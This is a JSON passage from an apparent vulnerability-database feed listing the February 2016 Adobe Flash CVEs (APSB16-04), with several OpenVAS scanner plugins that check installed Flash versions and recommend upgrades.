\n[CVE-2016-0967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0967>)10.0Critical \n[CVE-2016-0968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0968>)10.0Critical \n[CVE-2016-0969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0969>)10.0Critical \n[CVE-2016-0970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0970>)10.0Critical \n[CVE-2016-0972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0972>)10.0Critical \n[CVE-2016-0971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0971>)10.0Critical \n[CVE-2016-0976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0976>)10.0Critical \n[CVE-2016-0975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0975>)9.3Critical \n[CVE-2016-0974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0974>)10.0Critical \n[CVE-2016-0973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0973>)9.3Critical \n[CVE-2016-0980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0980>)10.0Critical \n[CVE-2016-0979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0979>)10.0Critical \n[CVE-2016-0978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0978>)10.0Critical \n[CVE-2016-0977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0977>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2016-02-09T00:00:00", "id": "KLA10756", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10756", "title": "\r KLA10756Arbitrary code execution in Adobe Flash Player & AIR ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-24T21:26:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806867", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806867\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to take control of the affected system,\n which could lead to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.569 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.569 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.569\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.569\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810659", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810659", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Windows", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810659\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:25:30 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 20.0.0.306 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.306\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.306\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810661", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810661\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:18:57 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-04) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 20.0.0.306 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.306\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.306\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:24:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806865", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806865", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806865\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.329 or 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"20.0.0.305\"))\n{\n fix = \"20.0.0.306\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.329\"))\n{\n fix = \"18.0.0.329\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "Mageia Linux Local Security Checks mgasa-2016-0062", "modified": "2019-03-14T00:00:00", "published": "2016-02-11T00:00:00", "id": "OPENVAS:1361412562310131217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131217", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0062.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131217\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-11 07:22:16 +0200 (Thu, 11 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0062\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.569 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves a type confusion vulnerability that could lead to code execution (CVE-2016-0985). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, CVE-2016-0984). This update resolves a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-0971). This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, CVE-2016-0981).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0062.html\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0062\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.569~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-02-11T00:00:00", "id": "OPENVAS:1361412562310851202", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851202", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:0398-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851202\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-02-11 06:41:09 +0100 (Thu, 11 Feb 2016)\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:0398-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\");\n\n script_tag(name:\"affected\", 